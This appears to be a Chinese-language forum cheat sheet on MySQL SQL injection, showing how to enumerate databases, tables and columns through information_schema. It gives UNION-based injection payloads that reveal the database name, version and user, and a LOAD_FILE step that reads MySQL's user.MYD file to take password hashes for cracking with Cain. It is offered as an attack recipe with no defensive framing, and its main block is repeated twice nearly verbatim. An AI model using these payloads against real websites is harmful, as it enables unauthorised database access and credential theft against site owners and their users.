爆表注射
mysql新增加一个库叫information_schema,可以爆库爆表爆字段。
首先介绍一下的是爆库
select SCHEMA_NAME from information_schema.SCHEMATA limit 5,1/* 5,1表示从第1个开始,数到第5个
然后就是爆表了。
select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x6D656D626572 limit 5,1/*TABLE_SCHEMA=后面是库名的16进制
再来爆字段
select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x61646D5F75736572 limit 5,1/*
一.查看MYSQL基本信息(库名,版本,用户)
and 1=2 union select 1,2,3,database(),5,version(),6,user(),7..../*
二.暴表
and 1=2 union select 1,2,3,TABLE_NAME,4,5,6,7...... from information_schema.TABLES where TABLE_SCHEMA =库的HEX limit 1,1/*
三.暴字段
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7.....from information_schema.COLUMNS where TABLE_NAME=表的HEX limit 1,1/*
关于找不到ROOT密码的爆破:
通过LOAD_FILE('C:\..\MYSQL\DATA\MYSQL\USER.MYD')得到用户的HASH散列,之后用CAIN爆破....
首先介绍一下的是爆库
select SCHEMA_NAME from information_schema.SCHEMATA limit 5,1/* 5,1表示从第1个开始,数到第5个
然后就是爆表了。
select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x6D656D626572 limit 5,1/*TABLE_SCHEMA=后面是库名的16进制
再来爆字段
select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x61646D5F75736572 limit 5,1/*
一.查看MYSQL基本信息(库名,版本,用户)
and 1=2 union select 1,2,3,database(),5,version(),6,user(),7..../*
二.暴表
and 1=2 union select 1,2,3,TABLE_NAME,4,5,6,7...... from information_schema.TABLES where TABLE_SCHEMA =库的HEX limit 1,1/*
三.暴字段
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7.....from information_schema.COLUMNS where TABLE_NAME=表的HEX limit 1,1/*
关于找不到ROOT密码的爆破:
通过LOAD_FILE('C:\..\MYSQL\DATA\MYSQL\USER.MYD')得到用户的HASH散列,之后用CAIN爆破....